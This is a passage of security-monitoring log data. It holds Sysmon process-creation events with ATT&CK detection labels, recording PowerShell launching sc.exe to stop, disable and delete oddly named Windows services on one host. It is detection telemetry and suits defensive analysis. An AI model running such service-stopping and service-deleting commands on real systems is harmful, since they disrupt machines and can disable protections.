Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.404",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.133 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010b0082100} +ProcessId: 1144 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationalmll Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationalmll Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.135527000Z"",""eventRecordID"":""2649"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.133\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010b0082100}\r\nProcessId: 1144\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationalmll Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.133"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010b0082100}"",""processId"":""1144"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationalmll Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.376",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.097 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-001018072100} +ProcessId: 5812 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.099269000Z"",""eventRecordID"":""2647"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.097\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-001018072100}\r\nProcessId: 5812\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:28.097"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-001018072100}"",""processId"":""5812"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.327",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.045 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a2042100} +ProcessId: 832 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.048472000Z"",""eventRecordID"":""2644"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.045\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a2042100}\r\nProcessId: 832\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.045"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010a2042100}"",""processId"":""832"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.290",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.993 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001090022100} +ProcessId: 2872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Nationaaal 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.996740400Z"",""eventRecordID"":""2642"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.993\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001090022100}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.993"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001090022100}"",""processId"":""2872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.281",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.976 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010b2012100} +ProcessId: 7724 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.978407400Z"",""eventRecordID"":""2641"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.976\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010b2012100}\r\nProcessId: 7724\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.976"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010b2012100}"",""processId"":""7724"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.217",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:50:27.922 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001002ff2000} +ProcessId: 6524 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.924662700Z"",""eventRecordID"":""2638"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.922\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001002ff2000}\r\nProcessId: 6524\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.922"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001002ff2000}"",""processId"":""6524"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
